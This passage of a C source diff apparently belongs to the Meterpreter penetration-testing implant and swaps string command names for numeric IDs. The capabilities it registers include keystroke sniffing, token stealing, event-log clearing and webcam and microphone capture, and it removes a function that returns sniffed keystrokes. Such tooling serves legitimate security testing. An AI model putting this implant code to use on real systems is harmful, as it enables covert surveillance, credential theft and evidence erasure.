+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_TERMINATE, request_sys_process_thread_terminate),
-	COMMAND_REQ("stdapi_sys_process_thread_query_regs", request_sys_process_thread_query_regs),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_QUERY_REGS, request_sys_process_thread_query_regs),
-	COMMAND_REQ("stdapi_sys_process_thread_set_regs", request_sys_process_thread_set_regs),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SET_REGS, request_sys_process_thread_set_regs),
 
 	// Registry
-	COMMAND_REQ("stdapi_registry_check_key_exists", request_registry_check_key_exists),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_CHECK_KEY_EXISTS, request_registry_check_key_exists),
-	COMMAND_REQ("stdapi_registry_load_key", request_registry_load_key),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_LOAD_KEY, request_registry_load_key),
-	COMMAND_REQ("stdapi_registry_unload_key", request_registry_unload_key),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_UNLOAD_KEY, request_registry_unload_key),
-	COMMAND_REQ("stdapi_registry_open_key", request_registry_open_key),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_OPEN_KEY, request_registry_open_key),
-	COMMAND_REQ("stdapi_registry_open_remote_key", request_registry_open_remote_key),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_OPEN_REMOTE_KEY, request_registry_open_remote_key),
-	COMMAND_REQ("stdapi_registry_create_key", request_registry_create_key),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_CREATE_KEY, request_registry_create_key),
-	COMMAND_REQ("stdapi_registry_enum_key", request_registry_enum_key),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY, request_registry_enum_key),
-	COMMAND_REQ("stdapi_registry_delete_key", request_registry_delete_key),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_DELETE_KEY, request_registry_delete_key),
-	COMMAND_REQ("stdapi_registry_close_key", request_registry_close_key),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_CLOSE_KEY, request_registry_close_key),
-	COMMAND_REQ("stdapi_registry_set_value", request_registry_set_value),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_SET_VALUE, request_registry_set_value),
-	COMMAND_REQ("stdapi_registry_query_value", request_registry_query_value),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE, request_registry_query_value),
-	COMMAND_REQ("stdapi_registry_query_class", request_registry_query_class),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_QUERY_CLASS, request_registry_query_class),
-	COMMAND_REQ("stdapi_registry_enum_value", request_registry_enum_value),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE, request_registry_enum_value),
-	COMMAND_REQ("stdapi_registry_delete_value", request_registry_delete_value),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_DELETE_VALUE, request_registry_delete_value),
-	COMMAND_REQ("stdapi_registry_enum_key_direct", request_registry_enum_key_direct),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY_DIRECT, request_registry_enum_key_direct),
-	COMMAND_REQ("stdapi_registry_enum_value_direct", request_registry_enum_value_direct),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE_DIRECT, request_registry_enum_value_direct),
-	COMMAND_REQ("stdapi_registry_query_value_direct", request_registry_query_value_direct),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE_DIRECT, request_registry_query_value_direct),
-	COMMAND_REQ("stdapi_registry_set_value_direct", request_registry_set_value_direct),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_SET_VALUE_DIRECT, request_registry_set_value_direct),
 
 	// Sys/config
-	COMMAND_REQ("stdapi_sys_config_getuid", request_sys_config_getuid),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_CONFIG_GETUID, request_sys_config_getuid),
-	COMMAND_REQ("stdapi_sys_config_localtime", request_sys_config_localtime),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_CONFIG_LOCALTIME, request_sys_config_localtime),
-	COMMAND_REQ("stdapi_sys_config_sysinfo", request_sys_config_sysinfo),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_CONFIG_SYSINFO, request_sys_config_sysinfo),
-	COMMAND_REQ("stdapi_sys_config_rev2self", request_sys_config_rev2self),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_CONFIG_REV2SELF, request_sys_config_rev2self),
-	COMMAND_REQ("stdapi_sys_config_getprivs", request_sys_config_getprivs),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_CONFIG_GETPRIVS, request_sys_config_getprivs),
-	COMMAND_REQ("stdapi_sys_config_getenv", request_sys_config_getenv),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_CONFIG_GETENV, request_sys_config_getenv),
-	COMMAND_REQ("stdapi_sys_config_driver_list", request_sys_config_driver_list),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_CONFIG_DRIVER_LIST, request_sys_config_driver_list),
-	COMMAND_REQ("stdapi_sys_config_steal_token", request_sys_config_steal_token),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_CONFIG_STEAL_TOKEN, request_sys_config_steal_token),
-	COMMAND_REQ("stdapi_sys_config_drop_token", request_sys_config_drop_token),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_CONFIG_DROP_TOKEN, request_sys_config_drop_token),
-	COMMAND_REQ("stdapi_sys_config_getsid", request_sys_config_getsid),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_CONFIG_GETSID, request_sys_config_getsid),
 
 	// Net
-	COMMAND_REQ("stdapi_net_config_get_routes", request_net_config_get_routes),
+	COMMAND_REQ(COMMAND_ID_STDAPI_NET_CONFIG_GET_ROUTES, request_net_config_get_routes),
-	COMMAND_REQ("stdapi_net_config_add_route", request_net_config_add_route),
+	COMMAND_REQ(COMMAND_ID_STDAPI_NET_CONFIG_ADD_ROUTE, request_net_config_add_route),
-	COMMAND_REQ("stdapi_net_config_remove_route", request_net_config_remove_route),
+	COMMAND_REQ(COMMAND_ID_STDAPI_NET_CONFIG_REMOVE_ROUTE, request_net_config_remove_route),
-	COMMAND_REQ("stdapi_net_config_get_interfaces", request_net_config_get_interfaces),
+	COMMAND_REQ(COMMAND_ID_STDAPI_NET_CONFIG_GET_INTERFACES, request_net_config_get_interfaces),
-	COMMAND_REQ("stdapi_net_config_get_arp_table", request_net_config_get_arp_table),
+	COMMAND_REQ(COMMAND_ID_STDAPI_NET_CONFIG_GET_ARP_TABLE, request_net_config_get_arp_table),
-	COMMAND_REQ("stdapi_net_config_get_netstat", request_net_config_get_netstat),
+	COMMAND_REQ(COMMAND_ID_STDAPI_NET_CONFIG_GET_NETSTAT, request_net_config_get_netstat),
 
 	// Proxy
-	COMMAND_REQ("stdapi_net_config_get_proxy", request_net_config_get_proxy_config),
+	COMMAND_REQ(COMMAND_ID_STDAPI_NET_CONFIG_GET_PROXY, request_net_config_get_proxy_config),
 	// Resolve
-	COMMAND_REQ("stdapi_net_resolve_host", request_resolve_host),
+	COMMAND_REQ(COMMAND_ID_STDAPI_NET_RESOLVE_HOST, request_resolve_host),
-	COMMAND_REQ("stdapi_net_resolve_hosts", request_resolve_hosts),
+	COMMAND_REQ(COMMAND_ID_STDAPI_NET_RESOLVE_HOSTS, request_resolve_hosts),
 
 	// Socket
-	COMMAND_REQ("stdapi_net_socket_tcp_shutdown", request_net_socket_tcp_shutdown),
+	COMMAND_REQ(COMMAND_ID_STDAPI_NET_SOCKET_TCP_SHUTDOWN, request_net_socket_tcp_shutdown),
 
 	// UI
-	COMMAND_REQ("stdapi_ui_enable_mouse", request_ui_enable_mouse),
+	COMMAND_REQ(COMMAND_ID_STDAPI_UI_ENABLE_MOUSE, request_ui_enable_mouse),
-	COMMAND_REQ("stdapi_ui_enable_keyboard", request_ui_enable_keyboard),
+	COMMAND_REQ(COMMAND_ID_STDAPI_UI_ENABLE_KEYBOARD, request_ui_enable_keyboard),
-	COMMAND_REQ("stdapi_ui_get_idle_time", request_ui_get_idle_time),
+	COMMAND_REQ(COMMAND_ID_STDAPI_UI_GET_IDLE_TIME, request_ui_get_idle_time),
-	COMMAND_REQ("stdapi_ui_start_keyscan", request_ui_start_keyscan),
+	COMMAND_REQ(COMMAND_ID_STDAPI_UI_START_KEYSCAN, request_ui_start_keyscan),
-	COMMAND_REQ("stdapi_ui_stop_keyscan", request_ui_stop_keyscan),
+	COMMAND_REQ(COMMAND_ID_STDAPI_UI_STOP_KEYSCAN, request_ui_stop_keyscan),
-	COMMAND_REQ("stdapi_ui_get_keys", request_ui_get_keys),
+	COMMAND_REQ(COMMAND_ID_STDAPI_UI_GET_KEYS_UTF8, request_ui_get_keys_utf8),
-	COMMAND_REQ("stdapi_ui_get_keys_utf8", request_ui_get_keys_utf8),
+	COMMAND_REQ(COMMAND_ID_STDAPI_UI_DESKTOP_ENUM, request_ui_desktop_enum),
-	COMMAND_REQ("stdapi_ui_desktop_enum", request_ui_desktop_enum),
+	COMMAND_REQ(COMMAND_ID_STDAPI_UI_DESKTOP_GET, request_ui_desktop_get),
-	COMMAND_REQ("stdapi_ui_desktop_get", request_ui_desktop_get),
+	COMMAND_REQ(COMMAND_ID_STDAPI_UI_DESKTOP_SET, request_ui_desktop_set),
-	COMMAND_REQ("stdapi_ui_desktop_set", request_ui_desktop_set),
+	COMMAND_REQ(COMMAND_ID_STDAPI_UI_DESKTOP_SCREENSHOT, request_ui_desktop_screenshot),
-	COMMAND_REQ("stdapi_ui_desktop_screenshot", request_ui_desktop_screenshot),
+	COMMAND_REQ(COMMAND_ID_STDAPI_UI_SEND_KEYS, request_ui_send_keys),
-	COMMAND_REQ("stdapi_ui_send_keys", request_ui_send_keys),
+	COMMAND_REQ(COMMAND_ID_STDAPI_UI_SEND_KEYEVENT, request_ui_send_keyevent),
-	COMMAND_REQ("stdapi_ui_send_keyevent", request_ui_send_keyevent),
+	COMMAND_REQ(COMMAND_ID_STDAPI_UI_SEND_MOUSE, request_ui_send_mouse),
-	COMMAND_REQ("stdapi_ui_send_mouse", request_ui_send_mouse),
 
 	// Event Log
-	COMMAND_REQ("stdapi_sys_eventlog_open", request_sys_eventlog_open),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_EVENTLOG_OPEN, request_sys_eventlog_open),
-	COMMAND_REQ("stdapi_sys_eventlog_numrecords", request_sys_eventlog_numrecords),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_EVENTLOG_NUMRECORDS, request_sys_eventlog_numrecords),
-	COMMAND_REQ("stdapi_sys_eventlog_read", request_sys_eventlog_read),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_EVENTLOG_READ, request_sys_eventlog_read),
-	COMMAND_REQ("stdapi_sys_eventlog_oldest", request_sys_eventlog_oldest),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_EVENTLOG_OLDEST, request_sys_eventlog_oldest),
-	COMMAND_REQ("stdapi_sys_eventlog_clear", request_sys_eventlog_clear),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_EVENTLOG_CLEAR, request_sys_eventlog_clear),
-	COMMAND_REQ("stdapi_sys_eventlog_close", request_sys_eventlog_close),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_EVENTLOG_CLOSE, request_sys_eventlog_close),
 
 	// Power
-	COMMAND_REQ("stdapi_sys_power_exitwindows", request_sys_power_exitwindows),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_POWER_EXITWINDOWS, request_sys_power_exitwindows),
 
 	// Webcam
-	COMMAND_REQ("webcam_list", request_webcam_list),
+	COMMAND_REQ(COMMAND_ID_STDAPI_WEBCAM_LIST, request_webcam_list),
-	COMMAND_REQ("webcam_start", request_webcam_start),
+	COMMAND_REQ(COMMAND_ID_STDAPI_WEBCAM_START, request_webcam_start),
-	COMMAND_REQ("webcam_get_frame", request_webcam_get_frame),
+	COMMAND_REQ(COMMAND_ID_STDAPI_WEBCAM_GET_FRAME, request_webcam_get_frame),
-	COMMAND_REQ("webcam_stop", request_webcam_stop),
+	COMMAND_REQ(COMMAND_ID_STDAPI_WEBCAM_STOP, request_webcam_stop),
 
 	// Audio
-	COMMAND_REQ("webcam_audio_record", request_ui_record_mic),
+	COMMAND_REQ(COMMAND_ID_STDAPI_WEBCAM_AUDIO_RECORD, request_ui_record_mic),
 
 	COMMAND_TERMINATOR
 };
@@ -194,16 +193,3 @@ DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
 
 	return ERROR_SUCCESS;
 }
-
-
-/*!
- * @brief Get the name of the extension.
- * @param buffer Pointer to the buffer to write the name to.
- * @param bufferSize Size of the \c buffer parameter.
- * @return Indication of success or failure.
- */
-DWORD __declspec(dllexport) GetExtensionName(char* buffer, int bufferSize)
-{
-	strncpy_s(buffer, bufferSize, "stdapi", bufferSize - 1);
-	return ERROR_SUCCESS;
-}

c/meterpreter/source/extensions/stdapi/server/sys/process/process.c

@@ -840,20 +840,22 @@ DWORD process_channel_read(Channel *channel, Packet *request,
  * Writes data from the remote half of the channel to the process's standard
  * input handle
  */
-DWORD process_channel_write( Channel *channel, Packet *request,
+DWORD process_channel_write(Channel* channel, Packet* request, LPVOID context, LPVOID buffer, DWORD bufferSize, LPDWORD bytesWritten)
-		LPVOID context, LPVOID buffer, DWORD bufferSize, LPDWORD bytesWritten )
 {
-	ProcessChannelContext *ctx = (ProcessChannelContext *)context;
+	ProcessChannelContext* ctx = (ProcessChannelContext*)context;
 	DWORD result = ERROR_SUCCESS;
 
-	dprintf( "[PROCESS] process_channel_write. channel=0x%08X, ctx=0x%08X", channel, ctx );
+	dprintf("[PROCESS] process_channel_write. channel=0x%08X, ctx=0x%08X", channel, ctx);
 
 	if (ctx == NULL)
 	{
 		return result;
 	}
-	if ( !WriteFile( ctx->pStdin, buffer, bufferSize, bytesWritten, NULL ) )
+
+	if (!WriteFile(ctx->pStdin, buffer, bufferSize, bytesWritten, NULL))
+	{
 		result = GetLastError();
+	}
 
 	return result;
 }
@@ -918,25 +920,32 @@ DWORD process_channel_interact_destroy( HANDLE waitable, LPVOID entryContext, LP
  * Callback for when data is available on the standard output handle of
  * a process channel that is interactive mode
  */
-DWORD process_channel_interact_notify(Remote *remote, LPVOID entryContext, LPVOID threadContext)
+DWORD process_channel_interact_notify(Remote* remote, LPVOID entryContext, LPVOID threadContext)
 {
-	Channel *channel = (Channel*)entryContext;
+	dprintf("[PROCESS] process_channel_interact_notify: START");
-	ProcessChannelContext *ctx = (ProcessChannelContext *)threadContext;
+	Channel* channel = (Channel*)entryContext;
+	ProcessChannelContext* ctx = (ProcessChannelContext*)threadContext;
 	DWORD bytesRead, bytesAvail = 0;
 	CHAR buffer[16384];
 	DWORD result = ERROR_SUCCESS;
 
 	if (!met_api->channel.exists(channel) || ctx == NULL)
 	{
+		dprintf("[PROCESS] process_channel_interact_notify: channel not here, or context is NULL");
 		return result;
 	}
-	if( PeekNamedPipe( ctx->pStdout, NULL, 0, NULL, &bytesAvail, NULL ) )
+
+	dprintf("[PROCESS] process_channel_interact_notify: looking for stuff on the stdout pipe");
+	if (PeekNamedPipe(ctx->pStdout, NULL, 0, NULL, &bytesAvail, NULL))
 	{
-		if( bytesAvail )
+		dprintf("[PROCESS] process_channel_interact_notify: named pipe call returned, %u bytes", bytesAvail);
+		if (bytesAvail)
 		{
-			if( ReadFile( ctx->pStdout, buffer, sizeof(buffer) - 1, &bytesRead, NULL ) )
+			dprintf("[PROCESS] process_channel_interact_notify: attempting to read %u bytes", bytesAvail);
+			if (ReadFile(ctx->pStdout, buffer, sizeof(buffer) - 1, &bytesRead, NULL))
 			{
-				return met_api->channel.write( channel, remote, NULL, 0, buffer, bytesRead, NULL );
+				dprintf("[PROCESS] process_channel_interact_notify: read %u bytes, passing to channel write", bytesRead);
+				return met_api->channel.write(channel, remote, NULL, 0, buffer, bytesRead, NULL);
 			}
 			result = GetLastError();
 		}
@@ -944,7 +953,7 @@ DWORD process_channel_interact_notify(Remote *remote, LPVOID entryContext, LPVOI
 		{
 			// sf: if no data is available on the pipe we sleep to avoid running a tight loop
 			// in this thread, as anonymous pipes won't block for data to arrive.
-			Sleep( 100 );
+			Sleep(100);
 		}
 	}
 	else
@@ -952,42 +961,51 @@ DWORD process_channel_interact_notify(Remote *remote, LPVOID entryContext, LPVOI
 		result = GetLastError();
 	}
 
-	if( result != ERROR_SUCCESS )
+	if (result != ERROR_SUCCESS)
 	{
-		dprintf("Closing down socket: result: %d\n", result);
+		dprintf("Closing down channel: result: %d\n", result);
-		process_channel_close( channel, NULL, ctx );
+		process_channel_close(channel, NULL, ctx);
-		met_api->channel.close( channel, remote, NULL, 0, NULL );
+		met_api->channel.close(channel, remote, NULL, 0, NULL);
 	}
 
+	dprintf("[PROCESS] process_channel_interact_notify: END");
 	return result;
 }
 
 /*
  * Enables or disables interactivity with the standard output handle on the channel
  */
-DWORD process_channel_interact(Channel *channel, Packet *request, LPVOID context, BOOLEAN interact)
+DWORD process_channel_interact(Channel* channel, Packet* request, LPVOID context, BOOLEAN interact)
 {
-	ProcessChannelContext *ctx = (ProcessChannelContext *)context;
+	ProcessChannelContext* ctx = (ProcessChannelContext*)context;
 	DWORD result = ERROR_SUCCESS;
 
-	dprintf( "[PROCESS] process_channel_interact. channel=0x%08X, ctx=0x%08X, interact=%d", channel, ctx, interact );
+	dprintf("[PROCESS] process_channel_interact. channel=0x%08X, ctx=0x%08X, interact=%d", channel, ctx, interact);
 
 	if (!met_api->channel.exists(channel) || ctx == NULL)
 	{
+		dprintf("[PROCESS] process_channel_interact: Channel doesn't exist or context is NULL");
 		return result;
 	}
+
 	// If the remote side wants to interact with us, schedule the stdout handle
 	// as a waitable item
-	if (interact) {
+	if (interact)
+	{
 		// try to resume it first, if it's not there, we can create a new entry
-		if( (result = met_api->scheduler.signal_waitable( ctx->pStdout, SchedulerResume )) == ERROR_NOT_FOUND ) {
+		if ((result = met_api->scheduler.signal_waitable(ctx->pStdout, SchedulerResume)) == ERROR_NOT_FOUND)
-			result = met_api->scheduler.insert_waitable( ctx->pStdout, channel, context,
+		{
+			result = met_api->scheduler.insert_waitable(ctx->pStdout, channel, context,
 				(WaitableNotifyRoutine)process_channel_interact_notify,
-				(WaitableDestroyRoutine)process_channel_interact_destroy );
+				(WaitableDestroyRoutine)process_channel_interact_destroy);
 		}
-	} else { // Otherwise, pause it
-		result = met_api->scheduler.signal_waitable( ctx->pStdout, SchedulerPause );
 	}
+	else
+	{
+		// Otherwise, pause it
+		result = met_api->scheduler.signal_waitable(ctx->pStdout, SchedulerPause);
+	}
+	dprintf("[PROCESS] process_channel_interact: done");
 	return result;
 }
 

c/meterpreter/source/extensions/stdapi/server/ui/keyboard.c

@@ -296,30 +296,6 @@ DWORD request_ui_stop_keyscan(Remote *remote, Packet *request)
 	return ERROR_SUCCESS;
 }
 
-/*
- * Returns the sniffed keystrokes
- */
-
-DWORD request_ui_get_keys(Remote *remote, Packet *request)
-{
-	Packet *response = met_api->packet.create_response(request);
-	DWORD result = ERROR_SUCCESS;
-
-  if (tKeyScan) {
-		// This works because NULL defines the end of data (or if its wrapped, the whole buffer)
-		met_api->packet.add_tlv_string(response, TLV_TYPE_KEYS_DUMP, (LPCSTR)g_keyscan_buf);
-		memset(g_keyscan_buf, 0, KEYBUFSIZE);
-		g_idx = 0;
-	}
-	else {
-		result = 1;
-	}
-
-	// Transmit the response
-	met_api->packet.transmit_response(result, remote, response);
-	return ERROR_SUCCESS;
-}
-
 /*
  * Returns the sniffed keystrokes (UTF-8)
  */

c/meterpreter/source/extensions/stdapi/server/ui/ui.h

@@ -9,7 +9,6 @@ DWORD request_ui_get_idle_time(Remote *remote, Packet *request);
 
 DWORD request_ui_start_keyscan(Remote *remote, Packet *request);
 DWORD request_ui_stop_keyscan(Remote *remote, Packet *request);
-DWORD request_ui_get_keys(Remote *remote, Packet *request);
 DWORD request_ui_get_keys_utf8(Remote *remote, Packet *request);
 
 DWORD request_ui_send_keys(Remote *remote, Packet *request);

c/meterpreter/source/extensions/unhook/unhook.c

@@ -19,7 +19,7 @@ DWORD unhook_pe(Remote *remote, Packet *packet);
 Command customCommands[] =
 {
 	// custom commands go here
-	COMMAND_REQ("unhook_pe", unhook_pe),
+	COMMAND_REQ(COMMAND_ID_UNHOOK_PE, unhook_pe),
 
 	COMMAND_TERMINATOR
 };
@@ -30,13 +30,13 @@ Command customCommands[] =
  * @param remote Pointer to the remote instance.
  * @return Indication of success or failure.
  */
-DWORD __declspec(dllexport) InitServerExtension(MetApi* api, Remote *remote)
+DWORD __declspec(dllexport) InitServerExtension(MetApi* api, Remote* remote)
 {
     met_api = api;
 
-	met_api->command.register_all( customCommands );
+    met_api->command.register_all(customCommands);
 
-	return ERROR_SUCCESS;
+    return ERROR_SUCCESS;
 }
 
 /*!
@@ -44,11 +44,11 @@ DWORD __declspec(dllexport) InitServerExtension(MetApi* api, Remote *remote)
  * @param remote Pointer to the remote instance.
  * @return Indication of success or failure.
  */
-DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
+DWORD __declspec(dllexport) DeinitServerExtension(Remote* remote)
 {
-	met_api->command.deregister_all( customCommands );
+    met_api->command.deregister_all(customCommands);
 
-	return ERROR_SUCCESS;
+    return ERROR_SUCCESS;
 }
 
 
@@ -64,16 +64,4 @@ DWORD unhook_pe(Remote *remote, Packet *packet)
 
 	return ERROR_SUCCESS;
 
-}
-
-/*!
- * @brief Get the name of the extension.
- * @param buffer Pointer to the buffer to write the name to.
- * @param bufferSize Size of the \c buffer parameter.
- * @return Indication of success or failure.
- */
-DWORD __declspec(dllexport) GetExtensionName(char* buffer, int bufferSize)
-{
-	strncpy_s(buffer, bufferSize, "unhook", bufferSize - 1);
-	return ERROR_SUCCESS;
 }

c/meterpreter/source/extensions/winpmem/winpmem_meterpreter.cpp

@@ -14,7 +14,7 @@ extern "C" {
 
 	Command customCommands[] =
 	{
-		COMMAND_REQ("dump_ram", dump_ram),
+		COMMAND_REQ(COMMAND_ID_WINPMEM_DUMP_RAM, dump_ram),
 		COMMAND_TERMINATOR
 	};
 
@@ -44,18 +44,6 @@ extern "C" {
 
 		return ERROR_SUCCESS;
 	}
-
-	/*!
-	 * @brief Get the name of the extension.
-	 * @param buffer Pointer to the buffer to write the name to.
-	 * @param bufferSize Size of the \c buffer parameter.
-	 * @return Indication of success or failure.
-	 */
-	DWORD __declspec(dllexport) GetExtensionName(char* buffer, int bufferSize)
-	{
-		strncpy_s(buffer, bufferSize, "winpmem", bufferSize - 1);
-		return ERROR_SUCCESS;
-	}
 }
 
 #include "winpmem_meterpreter.h"

c/meterpreter/source/metsrv/base.c

@@ -56,44 +56,44 @@ DWORD THREADCALL command_process_thread(THREAD * thread);
 Command baseCommands[] =
 {
 	// Console commands
-	{ "core_console_write",
+	{ COMMAND_ID_CORE_CONSOLE_WRITE,
 		{ remote_request_core_console_write, NULL, { TLV_META_TYPE_STRING }, 1 | ARGUMENT_FLAG_REPEAT },
 		{ remote_response_core_console_write, NULL, EMPTY_TLV },
 	},
 
 	// Native Channel commands
-	// this overloads the "core_channel_open" in the base command list
+	// this overloads the COMMAND_ID_CORE_CHANNEL_OPEN in the base command list
-	COMMAND_REQ_REP("core_channel_open", remote_request_core_channel_open, remote_response_core_channel_open),
+	COMMAND_REQ_REP(COMMAND_ID_CORE_CHANNEL_OPEN, remote_request_core_channel_open, remote_response_core_channel_open),
-	COMMAND_REQ("core_channel_write", remote_request_core_channel_write),
+	COMMAND_REQ(COMMAND_ID_CORE_CHANNEL_WRITE, remote_request_core_channel_write),
-	COMMAND_REQ_REP("core_channel_close", remote_request_core_channel_close, remote_response_core_channel_close),
+	COMMAND_REQ_REP(COMMAND_ID_CORE_CHANNEL_CLOSE, remote_request_core_channel_close, remote_response_core_channel_close),
 
 	// Buffered/Pool channel commands
-	COMMAND_REQ("core_channel_read", remote_request_core_channel_read),
+	COMMAND_REQ(COMMAND_ID_CORE_CHANNEL_READ, remote_request_core_channel_read),
 	// Pool channel commands
-	COMMAND_REQ("core_channel_seek", remote_request_core_channel_seek),
+	COMMAND_REQ(COMMAND_ID_CORE_CHANNEL_SEEK, remote_request_core_channel_seek),
-	COMMAND_REQ("core_channel_eof", remote_request_core_channel_eof),
+	COMMAND_REQ(COMMAND_ID_CORE_CHANNEL_EOF, remote_request_core_channel_eof),
-	COMMAND_REQ("core_channel_tell", remote_request_core_channel_tell),
+	COMMAND_REQ(COMMAND_ID_CORE_CHANNEL_TELL, remote_request_core_channel_tell),
 	// Soon to be deprecated
-	COMMAND_REQ("core_channel_interact", remote_request_core_channel_interact),
+	COMMAND_REQ(COMMAND_ID_CORE_CHANNEL_INTERACT, remote_request_core_channel_interact),
 	// Packet Encryption
-	COMMAND_REQ("core_negotiate_tlv_encryption", request_negotiate_aes_key),
+	COMMAND_REQ(COMMAND_ID_CORE_NEGOTIATE_TLV_ENCRYPTION, request_negotiate_aes_key),
 	// timeouts
-	COMMAND_REQ("core_transport_set_timeouts", remote_request_core_transport_set_timeouts),
+	COMMAND_REQ(COMMAND_ID_CORE_TRANSPORT_SET_TIMEOUTS, remote_request_core_transport_set_timeouts),
 
-	COMMAND_REQ("core_transport_getcerthash", remote_request_core_transport_getcerthash),
+	COMMAND_REQ(COMMAND_ID_CORE_TRANSPORT_GETCERTHASH, remote_request_core_transport_getcerthash),
-	COMMAND_REQ("core_transport_setcerthash", remote_request_core_transport_setcerthash),
+	COMMAND_REQ(COMMAND_ID_CORE_TRANSPORT_SETCERTHASH, remote_request_core_transport_setcerthash),
 
-	COMMAND_REQ("core_transport_list", remote_request_core_transport_list),
+	COMMAND_REQ(COMMAND_ID_CORE_TRANSPORT_LIST, remote_request_core_transport_list),
-	COMMAND_INLINE_REQ("core_transport_sleep", remote_request_core_transport_sleep),
+	COMMAND_INLINE_REQ(COMMAND_ID_CORE_TRANSPORT_SLEEP, remote_request_core_transport_sleep),
-	COMMAND_INLINE_REQ("core_transport_change", remote_request_core_transport_change),
+	COMMAND_INLINE_REQ(COMMAND_ID_CORE_TRANSPORT_CHANGE, remote_request_core_transport_change),
-	COMMAND_INLINE_REQ("core_transport_next", remote_request_core_transport_next),
+	COMMAND_INLINE_REQ(COMMAND_ID_CORE_TRANSPORT_NEXT, remote_request_core_transport_next),
-	COMMAND_INLINE_REQ("core_transport_prev", remote_request_core_transport_prev),
+	COMMAND_INLINE_REQ(COMMAND_ID_CORE_TRANSPORT_PREV, remote_request_core_transport_prev),
-	COMMAND_REQ("core_transport_add", remote_request_core_transport_add),
+	COMMAND_REQ(COMMAND_ID_CORE_TRANSPORT_ADD, remote_request_core_transport_add),
-	COMMAND_REQ("core_transport_remove", remote_request_core_transport_remove),
+	COMMAND_REQ(COMMAND_ID_CORE_TRANSPORT_REMOVE, remote_request_core_transport_remove),
 	// Migration
-	COMMAND_INLINE_REQ("core_migrate", remote_request_core_migrate),
+	COMMAND_INLINE_REQ(COMMAND_ID_CORE_MIGRATE, remote_request_core_migrate),
 	// Shutdown
-	COMMAND_INLINE_REQ("core_shutdown", remote_request_core_shutdown),
+	COMMAND_INLINE_REQ(COMMAND_ID_CORE_SHUTDOWN, remote_request_core_shutdown),
 	// Terminator
 	COMMAND_TERMINATOR
 };
@@ -112,7 +112,8 @@ void command_register_all(Command commands[])
 {
 	DWORD index;
 
-	for (index = 0; commands[index].method; index++)
+	// Zero indicates the end of the command list
+	for (index = 0; commands[index].command_id > 0; index++)
 	{
 		command_register(&commands[index]);
 	}
@@ -123,7 +124,7 @@ void command_register_all(Command commands[])
 	dprintf("[COMMAND LIST] Listing current extension commands");
 	for (command = extensionCommands; command; command = command->next)
 	{
-		dprintf("[COMMAND LIST] Found: %s", command->method);
+		dprintf("[COMMAND LIST] Found: %u", command->command_id);
 	}
 #endif
 }
@@ -137,7 +138,7 @@ DWORD command_register(Command *command)
 {
 	Command *newCommand;
 
-	dprintf("Registering a new command (%s)...", command->method);
+	dprintf("Registering a new command (%u)...", command->command_id);
 	if (!(newCommand = (Command *)malloc(sizeof(Command))))
 	{
 		return ERROR_NOT_ENOUGH_MEMORY;
@@ -169,7 +170,7 @@ void command_deregister_all(Command commands[])
 {
 	DWORD index;
 
-	for (index = 0; commands[index].method; index++)
+	for (index = 0; commands[index].command_id > 0; index++)
 	{
 		command_deregister(&commands[index]);
 	}
@@ -190,8 +191,10 @@ DWORD command_deregister(Command *command)
 		current;
 		prev = current, current = current->next)
 	{
-		if (strcmp(command->method, current->method))
+		if (command->command_id == current->command_id)
+		{
 			continue;
+		}
 
 		if (prev)
 		{
@@ -261,7 +264,7 @@ BOOL command_process_inline(Command *baseCommand, Command *extensionCommand, Rem
 	Command *commands[2] = { baseCommand, extensionCommand };
 	Command *command = NULL;
 	DWORD dwIndex;
-	LPCSTR lpMethod = NULL;
+	UINT commandId = 0;
 
 	__try
 	{
@@ -276,15 +279,15 @@ BOOL command_process_inline(Command *baseCommand, Command *extensionCommand, Rem
 					continue;
 				}
 
-				lpMethod = command->method;
+				commandId = command->command_id;
-				dprintf("[COMMAND] Executing command %s", lpMethod);
+				dprintf("[COMMAND] Executing command %u", commandId);
 
 				// Impersonate the thread token if needed (only on Windows)
 				if (remote->server_token != remote->thread_token)
 				{
 					if (!ImpersonateLoggedOnUser(remote->thread_token))
 					{
